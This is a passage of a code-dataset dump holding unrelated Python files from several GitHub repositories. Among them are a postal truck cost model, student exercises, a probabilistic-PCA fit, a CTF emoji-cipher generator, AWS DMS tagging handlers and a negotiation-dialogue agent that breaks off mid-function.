empty_truck_list[2] * pa.GL_CAP[0]\n break\n else:\n continue\n break\n else:\n continue\n break\n final_truck_list = [full_truck_list[j - 1], empty_truck_list]\n else:\n # 如果起-终使用的车型组合载重更大,则该条线路无需更新车辆使用情况\n final_truck_list = [full_truck_list[j - 1], [0, 0, 0, 0]]\n #计算成本\n temp_distance = distance.iloc[distance.loc[(distance['收寄城市'] == route_list[0][0]) & (distance['寄达城市'] == route_list[0][1])].index.tolist()[0], 2] # 查询距离\n driver_num = 2 if temp_distance >= pa.GL_DSP else 1 #司机数量\n truck_cost = transport_1(final_truck_list, temp_distance, driver_num)\n cost_detail.loc[i, \"车辆使用情况\"] = \"{0}-{1}的邮路使用{2}辆40t满载车,{3}辆20t满载车,{4}辆12t满载车以及{5}辆40t空载车,{6}辆20t空载车,{7}辆12t空载车\".format(cost_detail.iloc[i, 0], cost_detail.iloc[i, 1], final_truck_list[0][0], final_truck_list[0][1],final_truck_list[0][2], final_truck_list[1][0], final_truck_list[1][1], final_truck_list[1][2])\n cost_detail.loc[i, \"车辆成本\"] = truck_cost\n\n return cost_detail\n\n\n\n\n\n# 计算单条线路运输成本(尾量委办)\ndef transport_2(final_truck_list,temp_distance,driver_num):\n truck_cost_1= temp_distance * ((final_truck_list[0][0]) * (pa.GL_DEP[2] + pa.GL_LQ[2] + pa.GL_OTHER[2])+ (final_truck_list[0][1]) * (pa.GL_DEP[1] + pa.GL_LQ[1] + pa.GL_OTHER[1]) + (final_truck_list[0][2]) * (pa.GL_DEP[0] + pa.GL_LQ[0] + pa.GL_OTHER[0])) + \\\n temp_distance * (final_truck_list[0][0] * pa.GL_OIL[2] + final_truck_list[0][1] * pa.GL_OIL[1] + final_truck_list[0][2] *pa.GL_OIL[0]) + \\\n (temp_distance / pa.GL_V[2] * driver_num * pa.GL_LABOR[2] * final_truck_list[0][0]) + \\\n (temp_distance / pa.GL_V[1] * driver_num * pa.GL_LABOR[1] * final_truck_list[0][1]) + \\\n (temp_distance / pa.GL_V[0] * driver_num * pa.GL_LABOR[0] * final_truck_list[0][2])\n\n #自办邮路运输成本 = 折旧+路桥+其他费用+\n #油耗费用+\n #司机费用\n truck_cost_2 = temp_distance * ((final_truck_list[1][0]) * (pa.GL_DEP[2] + pa.GL_LQ[2] + pa.GL_OTHER[2]) * pa.GL_K[0]+ (final_truck_list[1][1]) * (pa.GL_DEP[1] + pa.GL_LQ[1] + pa.GL_OTHER[1]) * pa.GL_K[1]+ (final_truck_list[1][2]) * (pa.GL_DEP[0] + pa.GL_LQ[0] + pa.GL_OTHER[0]) * pa.GL_K[2]) + \\\n temp_distance * (final_truck_list[1][0] * pa.GL_OIL[2] * pa.GL_K[0] + final_truck_list[1][1] * pa.GL_OIL[1] * pa.GL_K[1] + final_truck_list[1][2] * pa.GL_OIL[0]) * pa.GL_K[2] + \\\n (temp_distance / pa.GL_V[2] * driver_num * pa.GL_LABOR[2] * final_truck_list[1][0] * pa.GL_K[0]) + \\\n (temp_distance / pa.GL_V[1] * driver_num * pa.GL_LABOR[1] * final_truck_list[1][1] * pa.GL_K[1]) + \\\n (temp_distance / pa.GL_V[0] * driver_num * pa.GL_LABOR[0] * final_truck_list[1][2] * pa.GL_K[2])\n #委办邮路运输成本 = 折旧+路桥+其他费用+\n #油耗费用+\n #司机费用(各类车型分别乘对应系数)\n truck_cost = truck_cost_1 + truck_cost_2\n return truck_cost\n\n# 计算车辆成本情况(尾量委办)\ndef transport_cost_2(cost_detail, weight, distance):\n '''\n\n :param cost_detail: 初始化车辆成本表\n :param weight: 运量(重量)表\n :param distance: 距离表\n :return: 最终成本表(尾量空载)\n '''\n initial_truck_list = truck_list(pa.GL_MAX) # 计算车辆组合清单\n for i in range(0, cost_detail.shape[0]): # 循环初始化表中的每一行\n\n print(\"共{0}层,目前循环到{1}层!\".format(cost_detail.shape[0], i + 1))\n\n route_list = [[cost_detail.loc[i, \"收寄城市\"], cost_detail.loc[i, \"寄达城市\"]],\n [cost_detail.loc[i, \"寄达城市\"], cost_detail.loc[i, \"收寄城市\"]]]\n # 线路清单 [[起,终],[终,起]]\n flow = [0,0]\n ziban_truck_list = []\n weiban_truck_list = [0, 0, 0, 0]\n for j in range(0, len(route_list)):\n flow[j] = weight.iloc[weight.loc[(weight['收寄城市'] == route_list[j][0]) & (weight['寄达城市'] == route_list[j][1])].index.tolist()[0], 2]\n # 查询该行起-终和终-起的运量(重量)并赋给flow\n ziban_truck_list.append(initial_truck(initial_truck_list, flow[j]))\n # 
计算起-终和终-起的初始车辆使用情况\n if j == 1:\n if ziban_truck_list[j][3] <= ziban_truck_list[j - 1][3]:\n for m in range(0, ziban_truck_list[j-1][0] + 1):\n for n in range(0, ziban_truck_list[j-1][1] + 1):\n for p in range(0, ziban_truck_list[j-1][2] + 1):\n if m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0] >= flow[j]:\n ziban_truck_list[j] = [m, n, p,m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]]\n weiban_truck_list = [ziban_truck_list[j-1][i] - ziban_truck_list[j][i] for i in range(len(ziban_truck_list[j-1]))]\n weiban_truck_list[3] = weiban_truck_list[0] * pa.GL_CAP[2] + weiban_truck_list[1] * pa.GL_CAP[1] + weiban_truck_list[2] * pa.GL_CAP[0]\n break\n else:\n continue\n break\n else:\n continue\n break\n final_truck_list = [ziban_truck_list[j], weiban_truck_list]\n else:\n\n for m in range(0, ziban_truck_list[j][0] + 1):\n for n in range(0, ziban_truck_list[j][1] + 1):\n for p in range(0, ziban_truck_list[j][2] + 1):\n if m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0] >= flow[j-1]:\n ziban_truck_list[j-1] = [m, n, p,m * pa.GL_CAP[2] + n * pa.GL_CAP[1] + p * pa.GL_CAP[0]]\n break\n else:\n continue\n break\n else:\n continue\n break\n final_truck_list = [ziban_truck_list[j-1], [0, 0, 0, 0]]\n\n # 计算成本\n\n temp_distance = distance.iloc[distance.loc[(distance['收寄城市'] == route_list[0][0]) & (distance['寄达城市'] == route_list[0][1])].index.tolist()[0], 2] #查询距离\n driver_num = 2 if temp_distance >= 400 else 1 #司机数量\n truck_cost = transport_2(final_truck_list, temp_distance, driver_num) #计算单条线路运输成本\n cost_detail.loc[i, \"车辆使用情况\"] = \"{0}-{1}的邮路使用{2}辆40t自办车,{3}辆20t自办车,{4}辆12t自办车以及{5}辆40t委办车,{6}辆20t委办车,{7}辆12t委办车\".format(cost_detail.iloc[i, 0], cost_detail.iloc[i, 1], final_truck_list[0][0], final_truck_list[0][1],final_truck_list[0][2], final_truck_list[1][0], final_truck_list[1][1], final_truck_list[1][2])\n cost_detail.loc[i, \"车辆成本\"] = truck_cost\n return cost_detail\n\n\n\ndef compare_transport_cost(cost_detail_1,cost_detail_2):\n cost_detail_final = pd.merge(cost_detail_1,cost_detail_2,how = 'outer',on = ['收寄城市','寄达城市']) #全连接\n for i in range(0,cost_detail_final.shape[0]):\n print(i)\n temp_cost_detail_1 = cost_detail_final[cost_detail_final.收寄城市 == cost_detail_final.loc[i,'寄达城市'] ]\n temp_cost_detail = temp_cost_detail_1[temp_cost_detail_1.寄达城市 == cost_detail_final.loc[i,'收寄城市']]\n\n temp_cost_detail.reset_index(inplace = True)\n\n temp_cost_x = temp_cost_detail.loc[0, '车辆成本_x']\n temp_cost_y = temp_cost_detail.loc[0, '车辆成本_y']\n\n\n if (cost_detail_final.loc[i,'车辆成本_x'] + temp_cost_x ) < (cost_detail_final.loc[i,'车辆成本_y']+temp_cost_y ):\n\n cost_detail_final['车辆使用情况'] = cost_detail_final.loc[i, '车辆使用情况_x']\n cost_detail_final['车辆成本'] = cost_detail_final.loc[i, '车辆成本_x']\n else:\n\n cost_detail_final['车辆使用情况'] = cost_detail_final.loc[i, '车辆使用情况_y']\n cost_detail_final['车辆成本'] = cost_detail_final.loc[i, '车辆成本_y']\n cost_detail_final.drop(columns = ['车辆使用情况_x','车辆成本_x','车辆使用情况_y','车辆成本_y'],inplace = True)\n\n return cost_detail_final\n\n\n\n\n#处理成本计算\ndef handle_cost(chuliliang_big,chuliliang_jibao):\n cost_handle = pd.merge(chuliliang_big,chuliliang_jibao,how = 'outer', on = ['中心局'])\n cost_handle.replace(np.nan,0,inplace = True)\n cost_handle['处理成本'] = cost_handle.apply(lambda x: (pa.GL_HANDLEC[0]*x.大件处理量 + pa.GL_HANDLEC[1]*x.集包件处理量),axis = 1 )\n\n cost_handle.drop(columns = ['大件处理量','集包件处理量'],inplace = True)\n\n return 
cost_handle","repo_name":"henghengandxinye/JiBaoChuanxing","sub_path":"Procedure_1.py","file_name":"Procedure_1.py","file_ext":"py","file_size_in_byte":18466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33297290095","text":"from random import randint, choice\n\n# Task 1\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\nprint(len(numbers))\nprint(numbers[-1])\nprint(numbers[::-1])\n\nif 5 in numbers and 17 in numbers:\n print('YES')\nelse:\n print('NO')\n\nprint(numbers[1:-1])\n\n# Task 2\ntext = input().lower()\ntext = ' ' + text + ' '\nprint(text.count(' a ') + text.count(' an ') + text.count(' the '))\n\n# Task 3\nnegative = []\npositive = []\nzero = []\nwhile True:\n num = input()\n if num == '':\n res = negative + zero + positive\n break\n\n num = int(num)\n if num < 0:\n negative.append(num)\n elif num == 0:\n zero.append(num)\n else:\n positive.append(num)\n\nfor num in res:\n print(num)\n\n# Task 4\nticket = []\ndropped = []\nnumbers = list(range(1, 50))\n\nwhile len(ticket) < 6:\n num = randint(1, 49)\n if num not in ticket:\n ticket.append(num)\n\nfor i in range(6):\n dropped.append(choice(numbers))\n numbers.remove(dropped[-1])\n\ndropped.sort()\nticket.sort()\nprint(dropped)\nprint(ticket)\n\nif dropped == ticket:\n print('win')\nelse:\n print('lose')\n","repo_name":"kuzminprog/python-school77","sub_path":"module02/solution/topic03_05.py","file_name":"topic03_05.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42462276047","text":"import pickle\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow_probability import edward2 as ed\nimport matplotlib.pyplot as plt\nplt.style.use(\"ggplot\")\n\nfrom PPCA import probabilistic_pca, replace_latents\n\nD = 2\nK = 1\nN = 1000\nsigma = 0.5\n\nwith open(\"generate.pkl\", \"rb\") as f:\n x_train, w_true, z_true = pickle.load(f)\n\n##########################################################\n\n# returns the joint distribution, i.e. 
a function of the original\n# parameters plus parameters for all random variables which appear\n# during the probabilistic program\nlog_joint = ed.make_log_joint_fn(probabilistic_pca)\n\ndef posterior_unnormalized(w, z):\n return log_joint(\n D=D,\n K=K,\n N=N,\n sigma=sigma,\n w=w,\n z=z,\n x=x_train)\n\nw = tf.Variable(np.ones([D, K]), dtype=tf.float32)\nz = tf.Variable(np.ones([K, N]), dtype=tf.float32)\n\nobjective = -posterior_unnormalized(w, z)\n\n##########################################################\n\noptimizer = tf.train.AdamOptimizer(learning_rate=0.05)\ntrain = optimizer.minimize(objective)\n\ninit = tf.global_variables_initializer()\nobjective_vals = []\n\nwith tf.Session() as sess:\n sess.run(init)\n\n for k in range(200):\n _, objective_val = sess.run([train, objective])\n objective_vals.append(objective_val)\n if k % 10 == 0:\n print(\"iter {}, objective = {}\".format(k, objective_val))\n\n w_map, z_map = sess.run([w, z])\n\nprint(\"\")\nprint(\"True principal axes:\")\nprint(w_true)\n\nprint(\"\")\nprint(\"MAP-estimated principal axes:\")\nprint(w_map)\n\nplt.plot(objective_vals)\nplt.show()\n\n\n\nwith ed.interception(replace_latents(w_map, z_map)):\n generate = probabilistic_pca(D=D, K=K, N=N, sigma=sigma)\n\nwith tf.Session() as sess:\n x_generated, dummy_w, dummy_z = sess.run(generate)\n\nplt.scatter(x_train[0, :], x_train[1, :], color='blue', alpha=0.1, label='Actual data')\nplt.scatter(x_generated[0, :], x_generated[1, :], color='red', alpha=0.1, label='Simulated data (MAP)')\nplt.legend()\nplt.axis([-20, 20, -20, 20])\nplt.show()\n","repo_name":"cambridge-mlg/demo_PPCA_pyro_edward2","sub_path":"tensorflow_probability/MAP.py","file_name":"MAP.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"}
{"seq_id":"38164678252","text":"import random\n\nemojis = [n for n in \"🌸🍔🐳🚀🌞🎉🍦🎈🐶🍕🌺🎸⚡️🦋🌼🎁\"]\nm = open(\"text.txt\", \"rb\").read().hex()\n\nrandom.shuffle(emojis)\n\nfor e, c in zip(emojis, \"0123456789abcdef\"):\n m = m.replace(c, e)\n\nopen(\"out.txt\", \"w\").write(m)\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/ImaginaryCTF/2023/crypto/emoticons/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"}
{"seq_id":"42553101323","text":"import InterparkCrawling as ic\nimport pandas as pd\n\ninfo = pd.read_csv(\"/data/musical_crawling_info/musical_info_ay.csv\",\n encoding=\"utf-8-sig\")\n\nname = info[\"Musical\"]\ncode = info[\"Code\"]\nth = info[\"Th\"]\n\n\nfor i in range(len(name)):\n print(code[i], name[i], th[i])\n ic.IPCrawling(str(code[i]), str(name[i]), str(th[i]))\n\n\"\"\"\nIf IPCrawling lands on the expectation-review tab instead:\nelem = driver.find_element(By.XPATH, \"/html/body/div[1]/div[5]/div[1]/div[2]/div[2]/nav/div/div/ul/li[4]/a\")\nchange li[4] to li[3]\n\"\"\"\n","repo_name":"seoyeon83/MLDA_Final-Project_Team1","sub_path":"code/review_crawling/crawling_ay.py","file_name":"crawling_ay.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"73607264567","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 2 14:21:31 2021\n\n@author: Mac\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import the dataset\ndataset= pd.read_csv('50_Startups.csv')\nX=dataset.iloc[:,:-1].values\ny=dataset.iloc[:,4].values\n#Encoding the categorical column 
X\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\nLabelencoder_X=LabelEncoder()\nX[:,3]=Labelencoder_X.fit_transform(X[:,3])\nct = ColumnTransformer([(\"State\", OneHotEncoder(), [3])], remainder = 'passthrough')\nX = ct.fit_transform(X)\n\n#Splitting the dataset into a training set and a test set\nX=X[:,1:]\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.2,random_state=0)\n\n#You don't need to scale your data; the library takes care of it\n\nfrom sklearn.linear_model import LinearRegression\nregressor=LinearRegression()\nregressor.fit(X_train,y_train)\nerror= regressor.score(X_train, y_train)\nprint('coefficient of determination:',error)\nprint('intercept:a', regressor.intercept_)\nprint('slope:b', regressor.coef_)\n\ny_pred = regressor.predict(X_test)\n\n#Building a model using backward elimination \nimport statsmodels.api as sm\n#Step 1: add b1X1 to our model with x1=1\nX = np.append(arr=np.ones((50,1)).astype(int),values=X,axis=1)\n#Step 2: fit the full model with all possible predictors\nX_opt = X[:,[0,1,2,3,4,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\nX_opt = X[:,[0,1,3,4,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n\nX_opt = X[:,[0,3,4,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n\n\nX_opt = X[:,[0,3,5]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n\nX_opt = X[:,[0,3]]\nX_opt = np.array(X_opt, dtype=float) \nregressor_OLS = sm.OLS(endog =y ,exog =X_opt).fit()\nprint(regressor_OLS.summary())\n","repo_name":"haidour18/Regression_ML_python","sub_path":"MultipleRegression.py","file_name":"MultipleRegression.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"42064290664","text":"lst=[\n [10,11],\n [13,45],\n [50,15],\n [60,70]\n]\n# for sub in lst:\n# for num in sub:\n# if num>16:\n# print(num)\nflatter_lst=[]\nfor sub in lst:\n for num in sub:\n flatter_lst.append(num)\nprint(flatter_lst)\nprint(max(flatter_lst))\n# flattrn_lst=[num for sub in lst for num in sub]\n# print(flattrn_lst)\n# num_grt=[num for num in flattrn_lst if num>16]\n# print(num_grt)\n# num_odd=[num for num in flattrn_lst if num%2!=0]\n# print(num_odd)\n\n# num_even=sum([num for num in flattrn_lst if num%2==0])\n# print(num_even)\n","repo_name":"jaseel24/pythonworks","sub_path":"listwork/nestedlist.py","file_name":"nestedlist.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"24741949535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest\nfrom db_model import addService, getDbObject\nfrom service_already_exists_exception import ServiceAlreadyExistsException\n\nDB = \"geomongo\"\nCOLLECTION = \"services\"\nID = \"_id\"\n\n\nclass TestAddService(unittest.TestCase):\n\n def testAddService(self):\n collection = getDbObject(DB)[COLLECTION]\n with self.assertRaises(ServiceAlreadyExistsException):\n obj = addService(\"testservice\", 1, ' ')\n obj_id = addService(\"test_GT_1203\", 1, ' ')\n obj = collection.find_one({ID: obj_id})\n 
self.assertNotEqual(obj, None)\n","repo_name":"PriyankaSurti/geo2tag","sub_path":"src/tst/test_GT_1203_add_service.py","file_name":"test_GT_1203_add_service.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"34966168786","text":"import os\nfrom helper.database_migration_service_helper import DatabaseMigrationServiceHelper\nfrom schemas.tag import TagModel\nfrom notification.slack import slack_event\nfrom notification.teams import teams_event\n\ndef EndPoint(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n endpointArn = event['detail']['responseElements']['endpoint']['endpointArn']\n tagged = DatabaseMigrationServiceHelper().tagging(resource=endpointArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(endpointArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(endpointArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\ndef Certificate(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n certificateArn = event['detail']['responseElements']['certificate']['certificateArn']\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=certificateArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(certificateArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(certificateArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\n\ndef Subnet(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n SubnetGroupIdentifier = event['detail']['responseElements']['replicationSubnetGroup']['replicationSubnetGroupIdentifier']\n replicationSubnetGroupArn = 'arn:aws:dms:' + event['region'] + ':' + event[\n 'account'] + ':subgrp:' + SubnetGroupIdentifier\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=replicationSubnetGroupArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(replicationSubnetGroupArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(replicationSubnetGroupArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\ndef EventSubscription(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n custSubscriptionId = event['detail']['responseElements']['eventSubscription']['custSubscriptionId']\n eventSubscriptionArn = 'arn:aws:dms:' + \\\n event['region'] + ':' + event['account'] + ':es:' + custSubscriptionId\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=eventSubscriptionArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n slack_event(eventSubscriptionArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(eventSubscriptionArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n\n\ndef ReplicationInstance(event, user):\n tag = TagModel(key=\"CreatedBy\", value=user)\n replicationInstanceArn = event['detail']['responseElements']['replicationInstance']['replicationInstanceArn']\n tagged = DatabaseMigrationServiceHelper().tagging(\n resource=replicationInstanceArn, tag=tag)\n if tagged:\n if os.getenv(\"ENABLE_SLACK\"):\n 
slack_event(replicationInstanceArn, user,\n event['account'], event['region'], event['source'])\n elif os.getenv(\"ENABLE_TEAMS\"):\n teams_event(replicationInstanceArn, user, event['account'],\n event['region'], event['source'])\n else:\n print(\"We will improve with other versions\")\n","repo_name":"Taghsin/taghsin","sub_path":"src/workers/dms_client.py","file_name":"dms_client.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"}
{"seq_id":"27970008767","text":"import torch as th\nimport numpy as np\nfrom scipy.misc import logsumexp\n\nfrom stanza.research import config\nfrom stanza.research.rng import get_rng\nfrom stanza.research.instance import Instance\n\nimport neural\nimport seq2seq\nimport tokenizers\nfrom agent import Agent, random_agent_name\nfrom baselines import RuleBasedAgent # NOQA: prevent cyclic import\nfrom vectorizers import MAX_FEASIBLE, NUM_ITEMS, GOAL_SIZE, all_possible_subcounts\nimport thutils\nfrom thutils import index_sequence, lrange, log_softmax, maybe_cuda as cu\n\nrng = get_rng()\n\nparser = config.get_options_parser()\nparser.add_argument('--max_dialogue_len', type=int, default=20,\n help='Maximum number of turns in a reinforcement learning dialogue rollout.')\nparser.add_argument('--goal_candidates', default=3, type=int,\n help='Number of candidates to sample for goal-directed decoding.')\nparser.add_argument('--goal_rollouts', default=3, type=int,\n help='Number of rollouts per candidate for goal-directed decoding.')\n\n\nITEMS = ('📕 ', '🎩 ', '⚽ ')\nNAMES = ('book', 'hat', 'ball')\n\nAGREE = +1\nDISAGREE = -1\nNO_AGREEMENT = 0\n\n\nclass HumanAgent(Agent):\n def start(self):\n print('===Negotiation REPL===')\n print('')\n print('Type dialogue responses normally. 
Selection commands start with a slash:')\n print(' /s 1 2 0 : select a final deal (ask for 1 book, 2 hats, 0 balls)')\n print(\" /y , /a : agree with partner's choice\")\n print(\" /n , /d : indicate no agreement or disagree with partner's choice\")\n print('')\n\n def new_game(self, game):\n counts, your_values, _ = game\n print('NEW GAME')\n print('')\n for i in range(3):\n print(f' {ITEMS[i] * counts[i]:8s} {NAMES[i]:4s} x{counts[i]}'\n f' worth {your_values[i]:d} each')\n print('')\n self.game = game\n self.selection = None\n\n def act(self, goal_directed='ignored', both_sides='ignored'):\n while True:\n line = input('YOU: ').lower()\n if self.selection is not None:\n if line[:2] not in ('/a', '/d', '/y', '/n', '/s'):\n print(' [partner has made proposal, choose agree (/a, /y) or '\n 'disagree (/d, /n, /s)]')\n continue\n elif line[:2] in ('/a', '/y'):\n return self.selection\n elif line[:2] in ('/d', '/n'):\n return []\n elif line.startswith('/s'):\n try:\n return self.parse_selection(line, self.game[0])\n except ValueError:\n continue\n else:\n continue\n elif line.startswith('/'):\n if line[:2] == '/s':\n try:\n return self.parse_selection(line, self.game[0])\n except ValueError:\n continue\n elif line[:2] in ('/d', '/n'):\n return []\n elif line[:2] in ('/a', '/y'):\n print(' [no proposal to agree to]')\n else:\n print(' [unknown command: {}]'.format(line))\n else:\n return ' '.join(tokenizers.basic_unigram_tokenizer(line.strip()))\n\n def observe(self, result):\n if isinstance(result, list):\n self.print_selection('Your partner', result)\n if self.selection is None:\n self.selection = invert_proposal(result, self.game)\n print('')\n else:\n return True\n else:\n assert isinstance(result, str)\n print(f'THEM: {result}')\n\n return False\n\n def parse_selection(self, line, counts):\n try:\n elems = line.split()\n selection = [int(e) for e in elems[1:4]]\n for s, c in zip(selection, counts):\n if s < 0:\n print(\" [number of items can't be negative]\")\n raise ValueError\n elif s > c:\n print(f\" [selection ({s}) greater than number of items ({c})]\")\n raise ValueError\n\n self.print_selection('You', selection)\n return selection\n except (IndexError, ValueError):\n print(' [/s must be followed by three integers (books, hats, balls)]')\n raise ValueError\n\n def print_selection(self, agent, result):\n print('')\n if result:\n print(f' {agent} requested:')\n for i in range(3):\n print(f' {ITEMS[i] * result[i]:8s} {NAMES[i]:4s} x{result[i]}')\n else:\n print(f' {agent} indicated no agreement.')\n\n def outcome(self, outcome):\n agreement, my_value, their_value = outcome\n print('')\n if agreement == DISAGREE:\n print(' RESULT: Disagreement (0 points each).')\n elif agreement == NO_AGREEMENT:\n print(' RESULT: No agreement (0 points each).')\n else:\n print(f' RESULT: Agreement, you got {my_value} points. 
(Partner got {their_value}.)')\n print('')\n\n\nclass TwoModelAgent(Agent):\n def new_game(self, game):\n if not hasattr(self, 'agent_id'):\n self.agent_id = random_agent_name()\n self.game = game\n self.dialogue = []\n self.sel_singleton = [None]\n\n def sample_action(self):\n return self.act(dialogue=self.dialogue)\n\n def dialogue_rollout(self, candidate, both_sides):\n rollout = list(self.dialogue)\n sel_singleton = list(self.sel_singleton)\n self.commit(candidate, dialogue=rollout, sel_singleton=sel_singleton)\n invert = True\n end = False\n while True:\n action = self.act(both_sides=both_sides, invert=invert,\n dialogue=rollout, sel_singleton=sel_singleton)\n if invert:\n if self.observe(action, dialogue=rollout, sel_singleton=sel_singleton):\n break\n else:\n if sel_singleton[0] is not None:\n end = True\n self.commit(action, dialogue=rollout, sel_singleton=sel_singleton)\n if end:\n break\n invert = not invert\n return compute_outcome(self.game, sel_singleton[0], action)\n\n def act(self, goal_directed=False, both_sides=False,\n invert=False, dialogue=None, sel_singleton=None):\n if goal_directed:\n return self.goal_directed_action(self.options.goal_candidates,\n self.options.goal_rollouts,\n both_sides=both_sides)\n\n if dialogue is None:\n dialogue = self.dialogue\n indent = ''\n inner_verbosity = 0\n else:\n indent = ' '\n inner_verbosity = -1\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n resp_model, sel_model = self.models[:2]\n\n if sel_singleton[0] is not None:\n inst = self.get_input_instance(self.game, dialogue, invert=invert)\n with thutils.device_context(sel_model.options.device):\n output = sel_model.predict([inst], random=True, verbosity=0)[0]\n if self.options.verbosity + inner_verbosity >= 5:\n print(f' {indent}--OUTPUT [{self.agent_id}]: {repr(output)}')\n return parse_selection(output, self.game[0])\n else:\n inst = self.get_input_instance(self.game, dialogue, invert=(invert and not both_sides))\n if len(dialogue) >= self.options.max_dialogue_len:\n response = ''\n else:\n with thutils.device_context(resp_model.options.device):\n response = resp_model.predict([inst], random=True, verbosity=0)[0]\n if self.options.verbosity + inner_verbosity >= 5:\n print(f' {indent}--RESPONSE [{self.agent_id}]: {repr(response)}')\n if response == '':\n inst = self.get_input_instance(self.game, dialogue + ['YOU: '],\n invert=invert)\n with thutils.device_context(sel_model.options.device):\n output = sel_model.predict([inst], random=True, verbosity=0)[0]\n if self.options.verbosity + inner_verbosity >= 5:\n print(f' {indent}--OUTPUT [{self.agent_id}]: {repr(output)}')\n return parse_selection(output, self.game[0])\n else:\n return response\n\n def commit(self, action, dialogue=None, sel_singleton=None):\n if dialogue is None:\n dialogue = self.dialogue\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(action, list):\n dialogue.append('YOU: ')\n if sel_singleton[0] is not None:\n sel_singleton[0] = action\n else:\n dialogue.append(f'YOU: {action}')\n\n def observe(self, result, dialogue=None, sel_singleton=None):\n if dialogue is None:\n dialogue = self.dialogue\n if sel_singleton is None:\n sel_singleton = self.sel_singleton\n\n if isinstance(result, list):\n dialogue.append(f'THEM: ')\n if sel_singleton[0] is None:\n sel_singleton[0] = result\n else:\n return True\n else:\n assert isinstance(result, str)\n dialogue.append('THEM: ' + result)\n\n return False\n\n def get_input_instance(self, game, dialogue, invert=False):\n if 
invert:\n rewards = self.infer_their_rewards(game, self.dialogue)\n else:\n rewards = game[1]\n pieces = [f'{game[0][0]} {rewards[0]} {game[0][1]} {rewards[1]} {game[0][2]} {rewards[2]}']\n for entry in dialogue:\n if invert:\n entry = entry.replace('YOU:', 'XYOU:')\n entry = entry.replace('THEM:', 'YOU:')\n entry = entry.replace('XYOU:', 'THEM:')\n pieces.append(f'{entry} ')\n input = ' '.join(pieces)\n if dialogue:\n input = input[:-len(' ')]\n result = Instance(input, '')\n if self.options.verbosity >= 6:\n print(result.__dict__)\n return result\n\n def goal_directed_action(self, num_candidates, num_rollouts, both_sides):\n candidates = [self.sample_action() for _ in range(num_candidates)]\n if self.options.verbosity >= 5:\n for candidate in candidates:\n print(f' --CANDIDATE [{self.agent_id}]: {repr(candidate)}')\n\n best_candidates = []\n best_ave_reward = 0.0\n for candidate in candidates:\n outcomes = [self.dialogue_rollout(candidate, both_sides=both_sides)\n for _ in range(num_rollouts)]\n ave_reward = np.mean([our_outcome[1] for our_outcome, _ in 